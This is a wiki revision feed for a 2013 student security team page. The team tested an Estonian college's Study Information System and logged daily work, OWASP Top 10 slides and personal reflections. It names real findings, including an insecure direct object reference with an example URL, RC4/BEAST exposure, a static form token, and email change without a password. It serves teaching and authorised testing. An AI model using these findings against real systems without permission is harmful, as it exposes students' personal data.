&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf]] Presentation slides (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360 (Team Security starts from 18:30)]&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62372</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62372"/>
		<updated>2013-04-05T06:04:49Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
